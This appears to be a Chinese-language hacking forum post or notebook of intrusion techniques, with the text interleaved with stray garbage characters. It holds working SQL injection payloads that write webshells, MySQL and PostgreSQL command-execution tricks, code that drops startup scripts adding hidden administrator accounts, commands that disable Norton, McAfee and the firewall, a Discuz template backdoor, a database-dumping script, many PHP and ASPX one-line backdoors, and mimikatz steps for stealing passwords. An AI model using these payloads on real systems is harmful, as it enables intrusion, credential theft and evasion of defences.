6 x0 M2 G, ]; M4 r8 F, h   找到PID值所对应的端口1 E; _. e1 f; u  B! p
. ~' G: x! R" Y6 \. c6 v9 j
查询sql server 2005中的密码hash
! n& ^. z, L) ^4 A( PSELECT password_hash FROM sys.sql_logins where name='sa'% X" Y* I" P' x* H& P
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
" F2 Q8 ~3 |6 Z1 }access中导出shell
5 K3 A( i2 x6 y3 ?6 T
1 k5 _: U+ Y8 c* |) T3 l中文版本操作系统中针对mysql添加用户完整代码:
2 s! f  j4 N* E# Q
# L( n, G7 x$ cuse test;! @( ?/ k, q% m" z! S) T* o
create table a (cmd text);% _0 l% a0 P6 b1 ^& {6 j
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
5 D! {8 K% D4 a! a" P9 O( i& Sinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );/ |9 @0 l3 n8 @7 i
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );5 M3 F: u( {) Z- V5 L; U1 O- o
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
6 Y+ t9 `9 Z: c, |$ e5 vdrop table a;% Z8 o; j! K# N0 r: h# d; p" y

8 x& v+ G* Y+ N2 R* r$ s& ]英文版本:- B4 p7 [  _1 O+ D7 Q# a

& q% T5 B/ }5 c& T3 B6 v8 U9 R- \use test;
& ]1 ^! y% h( l$ p. lcreate table a (cmd text);
) ?$ [! L. Y- @& E& A+ binsert into a values ("set wshshell=createobject (""wscript.shell"") " );! q9 `- {; g0 o% l1 a! M
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 S% a% z" N4 Einsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
. S+ C1 I3 o$ b* |  dselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";) l; M+ N' p6 i3 \+ e1 O' O
drop table a;6 e: e6 I0 ~& E& x8 _
" W% J$ J2 l# ^( l
create table a (cmd BLOB);  X0 n6 W* O& ~  u
insert into a values (CONVERT(木马的16进制代码,CHAR));) V5 b) d6 p- B8 ~/ d0 w, p
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
7 L; p1 l$ K5 i4 zdrop table a;
1 Q9 g$ y' f) _+ a, d1 n. }
3 E( L2 g$ v# m3 j记录一下怎么处理变态诺顿
. z% B5 j! D. W( N/ T查看诺顿服务的路径9 o4 r: ]% W3 ^8 G9 C! }
sc qc ccSetMgr- V& X7 K: E/ z7 Y" c  O  Y
然后设置权限拒绝访问。做绝一点。。
6 \# y: @+ c' x; X: Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system4 {4 `7 W  j! C5 N* k' ?1 e
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER") \: g0 w- @6 z7 C* I  X9 U7 B) p# x# s
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
; ?: X+ w6 F' x( O, Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone4 v) N1 d$ r$ V8 `. a1 ?

, A- R% n, U2 c' D- B& d/ ~% @! [然后再重启服务器9 U& C; l% _6 H* L
iisreset /reboot
% b. |8 G6 V' {2 v这样就搞定了。。不过完事后。记得恢复权限。。。。
( h* K& |  d, Wcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F: I# Y4 F8 a& m. N0 n- S7 g
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F4 o' W/ W8 y2 i8 s6 G2 D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
& u, g& t1 C5 n1 G/ L7 Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F/ y* t! R  T7 q$ y# ^
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin5 m0 {* y5 w, r1 b+ r5 z0 W5 }; d
6 ]* N3 F4 D8 m4 F5 [5 e8 A' c" j# Z6 j
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
! N" A2 W2 t. S* o: F4 Y6 N) @- w0 e+ @* v2 s+ O
postgresql注射的一些东西# D1 f* R+ S  t3 l
如何获得webshell
2 a: J" O  T7 _http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
3 e$ F' l7 `% D; p$ h' U% I. Ghttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 3 D- B, h, @% _# L4 M
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
: O6 c) G" x$ w$ L% ?3 i! _如何读文件
; }; @+ ]% I4 N' Whttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
3 D1 ~0 q0 w1 ^http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;- }8 Z) ?6 ^2 [1 }! V
http://127.0.0.1/postgresql.php?id=1;select * from myfile;: h) q! ?3 v% W& a6 w
* ?+ A3 [3 c" a  V: T+ Y
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。/ b9 b# D1 B( R8 E5 l4 N% L
当然,这些的postgresql的数据库版本必须大于8.X
, D1 {4 _, w1 @  R% X4 u创建一个system的函数:) I8 h- g0 X4 h  a3 F* ~; W
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
2 g6 Q' a- ?& z5 ~0 J$ L$ z
/ f2 j! i/ Z- `7 r创建一个输出表:0 d' z+ l6 l5 I" |: f: {
CREATE TABLE stdout(id serial, system_out text)
; U" @- p8 t* D+ ]; C- B* q' f0 B( s
执行shell,输出到输出表内:
1 X4 o/ @# \8 I# T1 {SELECT system('uname -a > /tmp/test'): \# S1 A. V% _, n, P
" B5 Z8 P3 H. E8 l1 Z/ S" y
copy 输出的内容到表里面;
# }- }5 p- T0 o: C) h4 w% fCOPY stdout(system_out) FROM '/tmp/test'
% p. t# [& n/ O4 N7 [4 C; ^- x: z7 ]0 D2 P" _+ v6 c. o: g- m6 z( m7 W
从输出表内读取执行后的回显,判断是否执行成功# x4 l7 f- X" K9 B1 M# N+ }
7 ?) Z: T) z7 r
SELECT system_out FROM stdout5 n: I* [  W) Y! j
下面是测试例子* c! R* m$ z  o$ S# N( P

/ a& U$ j4 a) S, h4 ?0 P/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- " a& \2 b  t& O0 u* D
/ }3 z) W2 S! V3 @% B
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
) S, e4 @; y7 F' @  Y5 i* M+ RSTRICT --4 I7 B0 e; F+ V4 b) q

' x$ U) Y9 {$ f) v+ Y3 V/store.php?id=1; SELECT system('uname -a > /tmp/test') --
3 Q! l8 U3 U  f% D
6 m, N# M. W6 y1 f$ O# x" I/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
2 e/ \3 n0 g- J8 C' d
# O4 c+ S1 F" e4 B2 y/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--( b2 J+ D2 \8 j* e
net stop sharedaccess    stop the default firewall- w1 t6 y+ ?2 \* _8 P1 H$ _6 r# Q
netsh firewall show      show/config default firewall
) }2 _6 [% F  c4 h; h) o: nnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall+ P2 @) g, G" k
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall% X7 H/ j2 A1 l- p7 c
修改3389端口方法(修改后不易被扫出)7 d+ R/ V  X  \
修改服务器端的端口设置,注册表有2个地方需要修改
8 q6 U8 T. O3 C% k3 b) d( t" R4 U( e! d$ {+ V* E
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]0 R8 H- P- R, B
PortNumber值,默认是3389,修改成所希望的端口,比如6000  p( J4 u4 \; Z

7 z* s- J, r4 `; b) p" W) Y0 D第二个地方:$ V& g: f2 s8 ?. i  M% }: d
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ) z* w7 e  _% J1 U7 U6 c
PortNumber值,默认是3389,修改成所希望的端口,比如6000
) l, s% D: E* [* y( T7 g9 m1 B3 e6 H! c& A3 ]  X$ F" e
现在这样就可以了。重启系统就可以了
3 l/ e8 R9 j9 B$ u; a& A6 _6 X3 I! t! i$ M( [6 l2 _6 L
查看3389远程登录的脚本( q% S' I- d6 `' \7 t8 J/ T( D
保存为一个bat文件# Z& n) n3 I, A0 w5 a! S  k
date /t >>D:\sec\TSlog\ts.log
: j' [& H2 M0 b" F: e2 l+ E6 |; Ctime /t >>D:\sec\TSlog\ts.log3 q6 D# i! {* |0 E5 v* M: L
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log6 Q" N6 H6 s4 O- u
start Explorer) V+ O" K% T% ]8 j! V
4 c0 O4 V0 p9 f( B5 r
mstsc的参数:
% ]7 U5 ~5 S; D; z. f, E! }$ `5 y! N- C' L% r
远程桌面连接
4 l, F- i& {; g; z5 E, Y4 J+ e; L" ~2 L) a4 q- J
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
: l# H" H' K# v5 m  J8 h  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
0 Q3 ~( F1 r7 w0 _
  b( S. t) J" r4 N<Connection File> -- 指定连接的 .rdp 文件的名称。
! f/ ]2 a+ d. P6 W; d/ q
0 P2 d7 u6 N( J) d# E4 G/v:<server[:port]> -- 指定要连接到的终端服务器。
* |( ]$ t) P2 @  d! C: h8 v
1 [1 c1 k7 Y; L' n0 T) G+ p/console -- 连接到服务器的控制台会话。
6 @) H3 I6 _* ?; L& S4 A6 ], @2 R6 l' U7 f) A) u
/f -- 以全屏模式启动客户端。1 V7 ]2 R1 r1 d, F$ `2 q# {
1 c1 ?& r) @4 ?. B/ L, ?/ D
/w:<width> --  指定远程桌面屏幕的宽度。
( T+ H. _- f1 A6 c4 q! R5 G& j8 v7 `* c/ y# g* J$ C9 P
/h:<height> -- 指定远程桌面屏幕的高度。
' g8 o/ c' d3 L  \5 s" ^- g) P5 o5 l' ?2 O
/edit -- 打开指定的 .rdp 文件来编辑。2 F" g' }% w( X6 E5 e

$ ~# Z; h+ |* Q/migrate -- 将客户端连接管理器创建的旧版- g  [0 Q6 C. G$ w
连接文件迁移到新的 .rdp 连接文件。3 F( K0 [/ C3 i3 H# o

/ `9 }% U- R) V, c7 H7 z5 v) Y& Y
+ y- k( ?  e$ P1 I" h其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
' G1 L+ e6 S; X3 U" I/ hmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
- R) h( j8 [4 P2 N; V1 S7 p
' S' }% ^, |7 B; L' |3 D$ e命令行下开启3389
# |* T2 T8 X2 ~, F) fnet user asp.net aspnet /add5 G1 z# F5 Y" Z* {
net localgroup Administrators asp.net /add5 V3 v# d% A. B6 p- G0 R8 X
net localgroup "Remote Desktop Users" asp.net /add
6 u5 A/ j% M$ n, |! H- F6 _! m6 gattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D/ C( F/ g3 o4 d: N. m: |
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0* b7 t- E8 u" F' E0 Z6 b
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
: o( @) M! m+ f$ ?: Q  V) Yecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f$ U4 C# \. O6 ?$ y
sc config rasman start= auto
+ Z' f" w. \( U' Ssc config remoteaccess start= auto
' s8 g( W9 o# E8 D* r& inet start rasman& M7 r: h) |7 V$ |, M: |4 X
net start remoteaccess
  B7 W$ A6 B& `: o: HMedia. ]3 N; f; G. \# H
<form id="frmUpload" enctype="multipart/form-data") r' ^  m% k  E" F5 A
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
2 @  m+ m: J! j$ A6 r/ _<input type="file" name="NewFile" size="50"><br>
# B' m: O4 V: Y$ t. j<input id="btnUpload" type="submit" value="Upload">
# m, K) I; ~4 ^0 O/ _! [</form>" N: e( p6 H  B5 m
9 l" R  C  S- U4 d- {- Q! g- l
control userpasswords2 查看用户的密码; C- ^" A" r) @- |
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
# F* m! }3 M# u& u8 [2 iSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
/ `4 j7 b8 D2 |% |9 V8 `, {8 ^2 s9 |+ j* p- @% `% |0 D: _
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:" h4 S/ r5 U+ {2 K" ]
测试1:
: t, m% }4 o$ I9 u4 a9 SSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
& L# c; r  ?' M, K, `, Q* i, w3 X- j% n% E& V9 z2 n/ D% D
测试2:
& ?( H4 s- V- Y
* l5 [; O$ P# S9 J+ l9 Acreate table dirs(paths varchar(100),paths1 varchar(100), id int)
. x3 r( O% K' @$ O  e, C
9 U9 y2 z0 c2 [delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
# b* B  X( r2 z+ L$ g, P' i: }' x
5 w9 o8 m* l) i8 ]2 q& @& K  \SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t16 H$ G8 R! R) r" P
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令1 i2 v2 c: v( q9 _
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;# _; f! \1 E2 s' |. s6 D
net stop mcafeeframework6 D( [% K1 ^6 W: K' ]' m
net stop mcshield
( k/ U, x5 S# m. {0 i9 W$ r6 tnet stop mcafeeengineservice, M! I2 c: Z6 u& s7 a
net stop mctaskmanager
5 [5 U6 A: U6 Y- q, |http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
/ y; d0 z+ D5 l& z" z5 N1 o  Y# ]0 G1 ^+ D' O1 ^
  VNCDump.zip (4.76 KB, 下载次数: 1) ! u8 n; U4 Z% q* d
密码在线破解http://tools88.com/safe/vnc.php
# @! s/ M; l. L0 z( s8 S3 v# cVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取3 u5 w. M3 l( i6 c, W* z3 W/ n
6 u; D5 A1 @6 C; H
exec master..xp_cmdshell 'net user'2 y2 s% h/ D, l- x4 F* K
mssql执行命令。6 y: B9 N6 K0 G% a! O( m* f
获取mssql的密码hash查询; u. i2 e1 [% B) F& U0 k/ G+ Y) `
select name,password from master.dbo.sysxlogins
" \$ r, {( P: o+ i& I9 ]+ n# h9 P4 e  V6 L; Q4 O0 C
backup log dbName with NO_LOG;
: p/ U  }. \$ }  Q- K8 y( ybackup log dbName with TRUNCATE_ONLY;2 D8 N& q" }( D2 Y2 @1 \" B2 R
DBCC SHRINKDATABASE(dbName);
& T/ S; Z$ m; Y4 zmssql数据库压缩9 E; X& G" |) M4 n. v! S1 [

, e  A8 o: r1 K8 w# u# RRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
' ?6 ~6 r; _3 y7 v+ }+ L将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。# Q5 \) Q  j5 X! ?: K8 \( ^: D% X
( F4 X+ l- `/ F4 t
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak': ]  h" a  @  g
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
  {' L$ b+ y8 g) B4 ~
, ~, f; E: \. L3 E7 \5 F" Y9 IDiscuz!nt35渗透要点:
. h% J: D; D% _1 G5 R1 i4 K(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default! p( T% N& k" B( [& c' G; L8 E9 J
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
# ?, Q& L; ?, D6 Q! |6 r; P(3)保存。1 }# ]4 t0 z  a6 o
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
$ U: y: _7 n+ @8 i: M8 zd:\rar.exe a -r d:\1.rar d:\website\
4 W- ?; G) m* P7 i3 y! ]3 I$ m递归压缩website( @( D8 Y; h# d( h$ J& \
注意rar.exe的路径
% k2 `0 @2 d$ j0 r& n' {% ^* Y  h* t. s
" o/ W5 r& i( j0 ]0 z<?php
/ L  Q9 U1 Z( p" F
/ N( B' ?# i; W3 b  _$telok   = "0${@eval($_POST[xxoo])}";
! k3 J: p7 E0 f; X3 q: }( N
! k. c& x3 e8 O& A9 q$ K$username   = "123456";* l$ _. B5 G  C- a% w' m: w
: n4 {; P, N, \6 J# m- z
$userpwd   = "123456";
2 o6 ]& D' j. H/ l+ S+ z5 v8 l
7 I( W1 @/ x: Y$ @' G" W$ c: e$telhao   = "123456";
1 \: e; n3 \# N+ H
0 b# {& j- Q  n0 X! Q6 L$telinfo   = "123456";& A3 U1 ]4 Q) S0 K' R( s
0 s; o( z0 n: m& F
?>! G9 C! N- P$ l* E) \' i' u" a
php一句话未过滤插入一句话木马
0 |) s& w4 `' @" m' y/ `; I7 J" t( ]7 u5 a2 w8 z
站库分离脱裤技巧9 L/ L* N* ?* t, p: H& ?+ [
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'2 k% b7 {6 W+ h* ]! T  z) V# x
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
5 \  b. J- a+ P, e; {8 C3 g条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。8 t4 g4 V$ T$ s: C4 l/ @  I. R/ O
这儿利用的是马儿的专家模式(自己写代码)。/ y; o  s% h1 M. a, O7 b4 x' }
ini_set('display_errors', 1);
/ }+ W5 V- h0 h# [set_time_limit(0);9 V0 ]5 j' [% D, o) Q
error_reporting(E_ALL);
8 d2 n2 f% ]! Z; N$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
4 v; H. X( {+ G8 U4 omysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());! A0 h- F3 G9 _6 |' U3 ]" ^
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());' I9 \! E  t0 i
$i = 0;
* |; i" C9 ~0 u9 s7 t0 Y" I' C4 J$tmp = '';
# ?! R. d7 ]  V/ I3 d- X8 hwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {$ \( J+ I3 q& W( D, U% M, I! |
    $i = $i+1;) c% i4 ^7 v" D: b8 `9 e5 D+ x& x
    $tmp .=  implode("::", $row)."\n";
- t- j, O. H3 ]  x    if(!($i%500)){//500条写入一个文件* X" K5 n- v8 L# J5 A8 [
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
* b0 e6 k5 Y$ Y3 Q! m) X) `- h        file_put_contents($filename,$tmp);( Z! E' l# ?! \. u0 I7 e0 m
        $tmp = '';
6 h! \- o4 k& `1 P1 ^    }4 b7 w) i8 h% |
}( X! Q' v; d% L+ N6 b- u
mysql_free_result($result);' \4 C. j& z/ H

& P5 k# k* a% [1 `
5 l9 M  a! x0 W6 {9 A/ w2 I, q& u0 f; A& @& o  b$ H1 C
//down完后delete
& h- e0 Z0 p# S) D9 k# J6 Q* M# n" i/ n& G; G7 Z0 l2 c  y

4 F  Z9 m3 j, X7 [0 Oini_set('display_errors', 1);
6 `: X. D) T* V- ^  @7 L& Q9 m8 Terror_reporting(E_ALL);6 G' e7 x, f4 M3 @  |
$i = 0;- A0 E: q5 l6 u! C" y1 u: `
while($i<32) {
% J5 i* D7 a9 G# V    $i = $i+1;
6 E$ `% Q( Q* r        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';2 @5 T8 f1 z# {# M% l  `! H
        unlink($filename);
7 G: W5 `5 g. t9 E+ z0 I} 9 z* F3 I8 M) w/ o
httprint 收集操作系统指纹/ T8 [7 c! M3 D8 r
扫描192.168.1.100的所有端口
4 c8 ]% C) h  J$ w5 Pnmap –PN –sT –sV –p0-65535 192.168.1.100' R. s. L3 W# u! W5 p1 m
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
  ?7 N: I+ ^, ]1 T2 b5 ahost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输- ~5 j" U0 `' o8 X- h. R8 A
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
/ G5 ?8 f/ N) M+ S8 E0 X* l1 u
7 `9 i  a' J6 ^, PDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册). E- z  N* Y# A3 M1 i- \0 D6 ?
  k% n' e% E1 C- h  J0 U  I2 i7 Y
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
+ P6 `- Q5 R1 M3 D9 p+ e
. a+ I3 j0 \& u  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
' F/ O) c4 @! k0 Z/ y
& V( _' `$ a7 M* s7 X$ w3 U  f  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
7 K0 q2 [# A6 v5 r  D; `) u
. Z9 k3 h" P, H: I! N+ J9 x9 V8 s  http://net-square.com/msnpawn/index.shtml (要求安装): J+ m* y' A+ C: a  C: L
# {' b5 W% N$ w! z6 I# y/ v
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
  W9 x9 Y( G. i: K! d& J* G6 ?# V
8 a6 ~1 C$ c) {$ ]- c  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
! g$ j" s7 N) M% wset names gb2312/ @7 g4 F! o0 V7 S
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。7 ^& r5 S0 E: e' v% z; i6 X

3 |# p' U9 P* l5 F4 x! ymysql 密码修改9 U7 t/ q# g: V# o
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” " R& O" p+ X8 j1 J8 a- N# U
update user set password=PASSWORD('antian365.com') where user='root';
# v5 I; @8 Q, y. u, q; L* s- U8 ?flush privileges;
& g3 x; x; }6 b4 j4 }5 K# N高级的PHP一句话木马后门
1 f; ^. I. T. r) Y# \$ m, s: h. I7 v! b: R' ^; q( c4 T' Q. C
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
( E% @% f& C# O- T8 Z# v( ?+ N) m1 E2 \' k: }2 V& Q
1、+ I7 W  {+ `3 ~
( u+ h8 @1 |7 s) b
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";, S/ K' }6 K) |! [5 M$ v* P$ q

: B& Y  i# [' [/ o  c$hh("/[discuz]/e",$_POST['h'],"Access");
) R8 o* w0 ~0 c) g& ]
& {0 G+ ^# w  X) p9 F$ E: B+ R0 t! b//菜刀一句话
2 A* f( I6 d' J3 N4 ^7 K7 ^- `1 G
. S) J/ B, p* y' a2、' ^/ r% b+ ]& l
  z8 U; o5 X/ q% {5 b% Q/ O0 z3 O
$filename=$_GET['xbid'];* a9 O4 W8 Q$ L

5 A( r/ T: k+ A5 minclude ($filename);
1 b1 L: F' A3 M% m1 Q- n( n; N; T6 y# v# Y9 `3 O. H; h
//危险的include函数,直接编译任何文件为php格式运行
5 x9 ^; A* J' }0 x1 M
' |$ b5 h% S3 M# P3、
/ u, w! B' z8 J. r' G7 Z2 ?: M. T  \3 ^
$reg="c"."o"."p"."y";7 Z8 W$ x% A& u6 ?' X

$ O, E9 e6 @! m/ Z: U, I$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);& y  I9 I2 `7 V+ w+ ~# w* \

7 w! t# _8 a# j' W4 l7 a; b//重命名任何文件
3 K2 }5 q' H7 J4 z
9 I2 v! H1 c* _- L5 q# @4、5 G; s2 @9 c+ O3 |1 C

/ Q+ ~+ Z& H5 B' d$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";- {/ i/ G4 V! i( y# h$ w; P

9 [" `6 C1 J$ L' {1 J' e# L: [$gzid("/[discuz]/e",$_POST['h'],"Access");
4 f! a1 e+ V2 l1 D% x9 L. F' o9 i  t  P" |7 P8 K6 T. n3 L
//菜刀一句话) {* [5 @9 \, s/ i, z6 z# {

! N' L* X% h# d5 P, z1 E5、include ($uid);* _! R, g+ x5 b3 `

6 y" ^$ ^- ~% h# m) {" g/ v0 W# r//危险的include函数,直接编译任何文件为php格式运行,POST 7 q+ |1 x( v7 S; w- @/ f- I
2 D# O8 X* P  b$ k8 C

. ]$ U- F6 S/ E2 D5 e//gif插一句话
: K6 {8 a9 K: o; |! n) d3 _; Y! E
$ ]% c6 s5 i4 n9 n  x6 ^6 K! T6、典型一句话' R" b, x5 E( O9 k7 \9 {  t! d
% p- i3 Q3 @, d/ [3 w
程序后门代码
3 s# Q' q" O# m0 s6 @# g<?php eval_r($_POST[sb])?>" j9 \& e) ]( X8 G4 |' [% K2 V3 J. v
程序代码' r6 D9 D" z; ?7 [
<?php @eval_r($_POST[sb])?>
5 q- N& |7 N' d0 Y//容错代码. A* E  O2 b2 V- }* T
程序代码. Q/ V1 _1 f, ]# F
<?php assert($_POST[sb]);?>4 m: M( c( K6 A, A" J+ e
//使用lanker一句话客户端的专家模式执行相关的php语句3 [1 m* b0 T0 u% v" n
程序代码
* e: o. W9 f+ o: k<?$_POST['sa']($_POST['sb']);?>
& @4 D" Z1 Z2 T$ ?( `程序代码
5 X) c  R/ k0 @6 D0 d$ c<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>" {& D# v7 u' @4 E
程序代码$ s) S4 Q' V6 U; }# R5 L
<?php, P0 i4 y& q, Q- E% C1 s3 i
@preg_replace("/[email]/e",$_POST['h'],"error");/ v/ p" \# M2 ?- D$ X9 l/ n% N
?>
6 ~0 w/ Q+ i8 s//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
5 y1 @- x  Z/ ?, ?- G程序代码
5 ?' s2 x; k$ P8 T# m<O>h=@eval_r($_POST[c]);</O>
8 C2 z/ b( \1 b- n程序代码* s+ A8 C, A  Q
<script language="php">@eval_r($_POST[sb])</script>
0 z4 Q8 J/ j% l! H8 x& b//绕过<?限制的一句话. ~6 y' K; l8 B

" n9 d7 i# H6 t$ L) ?: }/ {# w# Chttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
; n0 V$ z0 E$ k* j9 M6 I详细用法:7 d3 j/ V% c6 [# f2 }$ C' _8 {7 i
1、到tools目录。psexec \\127.0.0.1 cmd4 ~& Z: J" x' k# Q9 f3 t
2、执行mimikatz
% Y, g. H7 }1 e$ V# u3、执行 privilege::debug' z3 G; o) D* C8 L6 P) R
4、执行 inject::process lsass.exe sekurlsa.dll, I5 Z" b0 A2 b+ R& s
5、执行@getLogonPasswords
8 f1 S5 q( Z: k8 J. }* v  b6、widget就是密码
8 l4 V- u4 P; q7 {6 I2 T& U7、exit退出,不要直接关闭否则系统会崩溃。8 V% t% O3 I6 K$ `% \$ x9 }

0 r; J+ `: e1 U& G8 A% shttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面8 s& H; n3 `# R- V; O. i

* j* R$ S% m5 b2 e- S' Q自动查找系统高危补丁
, t$ R# T7 N% u9 ysysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
' A: n7 X$ v8 M, r: C
5 P' @$ T! Z1 G" Z. |突破安全狗的一句话aspx后门2 S: K0 D# C3 \" f
<%@ Page Language="C#" ValidateRequest="false" %>
8 ?2 p3 I' h' \0 E<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>1 n# X# S5 S- b7 a% {. h" x
webshell下记录WordPress登陆密码3 p/ V$ e) l) C5 s6 [
webshell下记录Wordpress登陆密码方便进一步社工  u$ p5 _. Z, r& \& X, U8 C  z) T
在文件wp-login.php中539行处添加:
